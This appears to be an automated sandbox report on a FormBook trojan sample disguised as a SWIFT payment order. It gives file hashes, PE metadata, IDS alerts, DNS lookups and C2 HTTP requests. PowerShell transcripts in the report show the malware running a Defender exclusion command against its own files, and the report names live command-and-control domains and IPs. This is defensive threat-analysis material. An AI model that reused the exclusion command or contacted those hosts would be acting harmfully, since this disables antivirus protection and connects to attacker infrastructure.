                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):669184
                                                          Entropy (8bit):7.7026776844711975
                                                          Encrypted:false
                                                          SSDEEP:12288:vCs0Vr2RpOtM9jWo4jS49MAr38GIXixBFm7XWABfGlW:qs0VCRgtMYo4jbMAr3MXi1DgfGw
                                                          MD5:FFF91C58119D3CD7F68457E8565F7116
                                                          SHA1:4201EB7214BD3658889739E4856412B8063E0405
                                                          SHA-256:F8C0D385ECE89CD926B2C74680C036F9927414955E7FF4ED12B576470B8C1745
                                                          SHA-512:C05CF9E0ED2AAD4C08B394D97FC1257D273AA8DD51A45487BA51FF5973AB7B2227ABA7EA1E1E8E9DAF7416AAEA418B06EDFA29FF93665F6D3CC5B1A392DBED92
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 36%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.a..............0......~......J.... ........@.. ....................................@.....................................O........z...................`....................................................... ............... ..H............text...`.... ...................... ..`.rsrc....z.......|..................@..@.reloc.......`.......4..............@..B................,.......H........e...u..............8.............................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....
                                                          C:\Users\user\AppData\Roaming\AnsPejV.exe:Zone.Identifier
                                                          Process:C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:false
                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                          C:\Users\user\Documents\20211125\PowerShell_transcript.767668.c7I805VN.20211125173008.txt
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):3604
                                                          Entropy (8bit):5.347973336216193
                                                          Encrypted:false
                                                          SSDEEP:96:BZL/UN04qDo1ZsB8Z1/UN04qDo1Z4qYbq0cbq0cbq0mZl:Zyy1
                                                          MD5:8AE9A22691D773B86900B6325C03EC43
                                                          SHA1:E80D83E1253AB678CA43BAA3085013D08A937D1E
                                                          SHA-256:0A7BCD43B7E1DC35C193F4A4F5E5D63763FBC98B088E8914440ACBB81C0313E7
                                                          SHA-512:56055C291F0B6D1621101AEEB6670D5D2821E4E4090BC1441D92B556BD3368813F5860E33E8AAEFD0209397B72990B0B925D2EF04685DE91AFAA332057821095
                                                          Malicious:false
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125173011..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 767668 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe..Process ID: 2540..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125173011..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe..**********************..Command start time: 20211125173252..**********************..PS>TerminatingErro
                                                          C:\Users\user\Documents\20211125\PowerShell_transcript.767668.vc7f5t7q.20211125173011.txt
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):5787
                                                          Entropy (8bit):5.375979082304954
                                                          Encrypted:false
                                                          SSDEEP:96:BZu/UNqqDo1Z9Zcd/UNqqDo1ZIEq8jZ9/UNqqDo1Z7lMMnZ0:NU
                                                          MD5:C0C13A582E37634B29E0F4BC6F44BA47
                                                          SHA1:397AFD879056F2B3E24F5C096AA34FCF841B5AAA
                                                          SHA-256:7B9B0E595B666EF88EC3BD1DB118A3E00341E7EE4085A44236BEC3C19237B1C3
                                                          SHA-512:8C84FCB1431A7F5B56732D76A5CB456104027C84B8EE253C90193111A3401EDAB84630850DC0227F96B6568D7170A94A5BAC40D5B2C64224D4187D82A295E6D8
                                                          Malicious:false
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125173012..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 767668 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\AnsPejV.exe..Process ID: 6252..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125173012..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\AnsPejV.exe..**********************..Windows PowerShell transcript start..Start time: 20211125173403..Username: computer\user..RunAs User: computer\alfon

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.7026776844711975
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          File size:669184
                                                          MD5:fff91c58119d3cd7f68457e8565f7116
                                                          SHA1:4201eb7214bd3658889739e4856412b8063e0405
                                                          SHA256:f8c0d385ece89cd926b2c74680c036f9927414955e7ff4ed12b576470b8c1745
                                                          SHA512:c05cf9e0ed2aad4c08b394d97fc1257d273aa8dd51a45487ba51ff5973ab7b2227aba7ea1e1e8e9daf7416aaea418b06edfa29ff93665f6d3cc5b1a392dbed92
                                                          SSDEEP:12288:vCs0Vr2RpOtM9jWo4jS49MAr38GIXixBFm7XWABfGlW:qs0VCRgtMYo4jbMAr3MXi1DgfGw
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....E.a..............0......~......J.... ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:b296d2c2a2868682

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x46d44a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x619F45FB [Thu Nov 25 08:14:51 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [ebp+0800000Eh], ch
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6d3f80x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x6e0000x37a0c.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa60000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x6b4600x6b600False0.883576469732data7.85893644673IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x6e0000x37a0c0x37c00False0.510505710482data7.05663977483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xa60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x6e2b00xf9eePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                          RT_ICON0x7dca00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 1510015233, next used block 1359020289
                                                          RT_ICON0x8e4c80x94a8data
                                                          RT_ICON0x979700x5488data
                                                          RT_ICON0x9cdf80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 16777216
                                                          RT_ICON0xa10200x25a8data
                                                          RT_ICON0xa35c80x10a8data
                                                          RT_ICON0xa46700x988data
                                                          RT_ICON0xa4ff80x468GLS_BINARY_LSB_FIRST
                                                          RT_GROUP_ICON0xa54600x84data
                                                          RT_VERSION0xa54e40x33cdata
                                                          RT_MANIFEST0xa58200x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Version Infos

                                                          DescriptionData
                                                          Translation0x0000 0x04b0
                                                          LegalCopyrightCopyright Rogers Peet
                                                          Assembly Version8.0.6.0
                                                          InternalNameUTF8Encodi.exe
                                                          FileVersion5.6.0.0
                                                          CompanyNameRogers Peet
                                                          LegalTrademarks
                                                          Comments
                                                          ProductNameBiblan
                                                          ProductVersion5.6.0.0
                                                          FileDescriptionBiblan
                                                          OriginalFilenameUTF8Encodi.exe

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          11/25/21-17:31:51.368314TCP1201ATTACK-RESPONSES 403 Forbidden804978323.227.38.74192.168.2.5
                                                          11/25/21-17:31:56.587015TCP1201ATTACK-RESPONSES 403 Forbidden804978434.102.136.180192.168.2.5
                                                          11/25/21-17:32:15.930041TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982380192.168.2.5154.196.11.204
                                                          11/25/21-17:32:15.930041TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982380192.168.2.5154.196.11.204
                                                          11/25/21-17:32:15.930041TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982380192.168.2.5154.196.11.204

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 25, 2021 17:31:45.719856024 CET4978280192.168.2.5156.226.250.165
                                                          Nov 25, 2021 17:31:45.964989901 CET8049782156.226.250.165192.168.2.5
                                                          Nov 25, 2021 17:31:45.965420961 CET4978280192.168.2.5156.226.250.165
                                                          Nov 25, 2021 17:31:45.965542078 CET4978280192.168.2.5156.226.250.165
                                                          Nov 25, 2021 17:31:46.210335970 CET8049782156.226.250.165192.168.2.5
                                                          Nov 25, 2021 17:31:46.210633039 CET8049782156.226.250.165192.168.2.5
                                                          Nov 25, 2021 17:31:46.210664034 CET8049782156.226.250.165192.168.2.5
                                                          Nov 25, 2021 17:31:46.210809946 CET4978280192.168.2.5156.226.250.165
                                                          Nov 25, 2021 17:31:46.210865974 CET4978280192.168.2.5156.226.250.165
                                                          Nov 25, 2021 17:31:46.455235958 CET8049782156.226.250.165192.168.2.5
                                                          Nov 25, 2021 17:31:51.296145916 CET4978380192.168.2.523.227.38.74
                                                          Nov 25, 2021 17:31:51.313524008 CET804978323.227.38.74192.168.2.5
                                                          Nov 25, 2021 17:31:51.313710928 CET4978380192.168.2.523.227.38.74
                                                          Nov 25, 2021 17:31:51.314028978 CET4978380192.168.2.523.227.38.74
                                                          Nov 25, 2021 17:31:51.331347942 CET804978323.227.38.74192.168.2.5
                                                          Nov 25, 2021 17:31:51.368314028 CET804978323.227.38.74192.168.2.5
                                                          Nov 25, 2021 17:31:51.368364096 CET804978323.227.38.74192.168.2.5
                                                          Nov 25, 2021 17:31:51.368402958 CET804978323.227.38.74192.168.2.5
                                                          Nov 25, 2021 17:31:51.368439913 CET804978323.227.38.74192.168.2.5
                                                          Nov 25, 2021 17:31:51.368480921 CET804978323.227.38.74192.168.2.5
                                                          Nov 25, 2021 17:31:51.368510008 CET4978380192.168.2.523.227.38.74
                                                          Nov 25, 2021 17:31:51.368520021 CET804978323.227.38.74192.168.2.5
                                                          Nov 25, 2021 17:31:51.368537903 CET4978380192.168.2.523.227.38.74
                                                          Nov 25, 2021 17:31:51.368554115 CET804978323.227.38.74192.168.2.5
                                                          Nov 25, 2021 17:31:51.368602037 CET4978380192.168.2.523.227.38.74
                                                          Nov 25, 2021 17:31:51.368676901 CET4978380192.168.2.523.227.38.74
                                                          Nov 25, 2021 17:31:51.368690014 CET4978380192.168.2.523.227.38.74
                                                          Nov 25, 2021 17:31:56.446407080 CET4978480192.168.2.534.102.136.180
                                                          Nov 25, 2021 17:31:56.468755960 CET804978434.102.136.180192.168.2.5
                                                          Nov 25, 2021 17:31:56.468925953 CET4978480192.168.2.534.102.136.180
                                                          Nov 25, 2021 17:31:56.469037056 CET4978480192.168.2.534.102.136.180
                                                          Nov 25, 2021 17:31:56.493033886 CET804978434.102.136.180192.168.2.5
                                                          Nov 25, 2021 17:31:56.587014914 CET804978434.102.136.180192.168.2.5
                                                          Nov 25, 2021 17:31:56.587055922 CET804978434.102.136.180192.168.2.5
                                                          Nov 25, 2021 17:31:56.587212086 CET4978480192.168.2.534.102.136.180
                                                          Nov 25, 2021 17:31:56.587269068 CET4978480192.168.2.534.102.136.180
                                                          Nov 25, 2021 17:31:56.610393047 CET804978434.102.136.180192.168.2.5
                                                          Nov 25, 2021 17:32:01.763933897 CET4978680192.168.2.5209.17.116.163
                                                          Nov 25, 2021 17:32:04.778645992 CET4978680192.168.2.5209.17.116.163
                                                          Nov 25, 2021 17:32:04.897687912 CET8049786209.17.116.163192.168.2.5
                                                          Nov 25, 2021 17:32:04.897872925 CET4978680192.168.2.5209.17.116.163
                                                          Nov 25, 2021 17:32:04.898037910 CET4978680192.168.2.5209.17.116.163
                                                          Nov 25, 2021 17:32:05.017940044 CET8049786209.17.116.163192.168.2.5
                                                          Nov 25, 2021 17:32:05.017962933 CET8049786209.17.116.163192.168.2.5
                                                          Nov 25, 2021 17:32:05.018167973 CET4978680192.168.2.5209.17.116.163
                                                          Nov 25, 2021 17:32:05.018243074 CET4978680192.168.2.5209.17.116.163
                                                          Nov 25, 2021 17:32:05.137280941 CET8049786209.17.116.163192.168.2.5

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 25, 2021 17:31:29.427968979 CET5696953192.168.2.58.8.8.8
                                                          Nov 25, 2021 17:31:29.496268988 CET53569698.8.8.8192.168.2.5
                                                          Nov 25, 2021 17:31:34.520800114 CET5516153192.168.2.58.8.8.8
                                                          Nov 25, 2021 17:31:34.980089903 CET53551618.8.8.8192.168.2.5
                                                          Nov 25, 2021 17:31:40.000199080 CET4999253192.168.2.58.8.8.8
                                                          Nov 25, 2021 17:31:40.160962105 CET53499928.8.8.8192.168.2.5
                                                          Nov 25, 2021 17:31:45.217300892 CET5501653192.168.2.58.8.8.8
                                                          Nov 25, 2021 17:31:45.712985039 CET53550168.8.8.8192.168.2.5
                                                          Nov 25, 2021 17:31:51.231298923 CET6434553192.168.2.58.8.8.8
                                                          Nov 25, 2021 17:31:51.293879032 CET53643458.8.8.8192.168.2.5
                                                          Nov 25, 2021 17:31:56.375845909 CET5712853192.168.2.58.8.8.8
                                                          Nov 25, 2021 17:31:56.445342064 CET53571288.8.8.8192.168.2.5
                                                          Nov 25, 2021 17:32:01.617950916 CET5046353192.168.2.58.8.8.8
                                                          Nov 25, 2021 17:32:01.762604952 CET53504638.8.8.8192.168.2.5
                                                          Nov 25, 2021 17:32:10.031330109 CET5941353192.168.2.58.8.8.8
                                                          Nov 25, 2021 17:32:10.249469995 CET53594138.8.8.8192.168.2.5
                                                          Nov 25, 2021 17:32:15.327850103 CET6051653192.168.2.58.8.8.8
                                                          Nov 25, 2021 17:32:15.544023991 CET53605168.8.8.8192.168.2.5

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Nov 25, 2021 17:31:29.427968979 CET192.168.2.58.8.8.80xeb06Standard query (0)www.innovativepropsolutions.comA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:31:34.520800114 CET192.168.2.58.8.8.80x15eeStandard query (0)www.754711.comA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:31:40.000199080 CET192.168.2.58.8.8.80x3c56Standard query (0)www.blueharepress.comA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:31:45.217300892 CET192.168.2.58.8.8.80x4666Standard query (0)www.wamhsh.comA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:31:51.231298923 CET192.168.2.58.8.8.80x2508Standard query (0)www.pyjama-france.comA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:31:56.375845909 CET192.168.2.58.8.8.80x6adfStandard query (0)www.hpsaddlerock.comA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:32:01.617950916 CET192.168.2.58.8.8.80xfae3Standard query (0)www.aarondecker.onlineA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:32:10.031330109 CET192.168.2.58.8.8.80x2679Standard query (0)www.elderlycareacademy.comA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:32:15.327850103 CET192.168.2.58.8.8.80x5cd4Standard query (0)www.oki-net.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Nov 25, 2021 17:31:29.496268988 CET8.8.8.8192.168.2.50xeb06Name error (3)www.innovativepropsolutions.comnonenoneA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:31:34.980089903 CET8.8.8.8192.168.2.50x15eeName error (3)www.754711.comnonenoneA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:31:40.160962105 CET8.8.8.8192.168.2.50x3c56Name error (3)www.blueharepress.comnonenoneA (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:31:45.712985039 CET8.8.8.8192.168.2.50x4666No error (0)www.wamhsh.com156.226.250.165A (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:31:51.293879032 CET8.8.8.8192.168.2.50x2508No error (0)www.pyjama-france.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                          Nov 25, 2021 17:31:51.293879032 CET8.8.8.8192.168.2.50x2508No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:31:56.445342064 CET8.8.8.8192.168.2.50x6adfNo error (0)www.hpsaddlerock.comhpsaddlerock.comCNAME (Canonical name)IN (0x0001)
                                                          Nov 25, 2021 17:31:56.445342064 CET8.8.8.8192.168.2.50x6adfNo error (0)hpsaddlerock.com34.102.136.180A (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:32:01.762604952 CET8.8.8.8192.168.2.50xfae3No error (0)www.aarondecker.online209.17.116.163A (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:32:10.249469995 CET8.8.8.8192.168.2.50x2679No error (0)www.elderlycareacademy.comwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)
                                                          Nov 25, 2021 17:32:10.249469995 CET8.8.8.8192.168.2.50x2679No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)
                                                          Nov 25, 2021 17:32:15.544023991 CET8.8.8.8192.168.2.50x5cd4No error (0)www.oki-net.com154.196.11.204A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • www.wamhsh.com
                                                          • www.pyjama-france.com
                                                          • www.hpsaddlerock.com
                                                          • www.aarondecker.online

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.549782156.226.250.16580C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Nov 25, 2021 17:31:45.965542078 CET7494OUTGET /46uq/?3fQ0Khi=Ue3PnYf+WtitO9Jkut75Ma3k2TKhCZznjjMu1kid5hA29ktIECD3KZ7svhzldzsG+GSp&j0=SFN8Rxuh3 HTTP/1.1
                                                          Host: www.wamhsh.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Nov 25, 2021 17:31:46.210633039 CET7495INHTTP/1.1 404 Not Found
                                                          Date: Thu, 25 Nov 2021 16:31:46 GMT
                                                          Server: Apache
                                                          Content-Length: 260
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 77 61 6d 68 73 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.wamhsh.com Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.54978323.227.38.7480C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Nov 25, 2021 17:31:51.314028978 CET7496OUTGET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=KgIlRYVH25tNYqbEG8kO4R44bHZw5lHi55V8k/E4GGeqoND16iqE+SGGf+ZfndkYvzRB HTTP/1.1
                                                          Host: www.pyjama-france.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Nov 25, 2021 17:31:51.368314028 CET7497INHTTP/1.1 403 Forbidden
                                                          Date: Thu, 25 Nov 2021 16:31:51 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          X-Sorting-Hat-PodId: 183
                                                          X-Sorting-Hat-ShopId: 51998097592
                                                          X-Request-ID: dbaee5ab-3952-40fa-97f1-8e4299a03f3a
                                                          X-Download-Options: noopen
                                                          X-Content-Type-Options: nosniff
                                                          X-Permitted-Cross-Domain-Policies: none
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Dc: gcp-europe-west1
                                                          CF-Cache-Status: DYNAMIC
                                                          Server: cloudflare
                                                          CF-RAY: 6b3c4509ccd05b7a-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
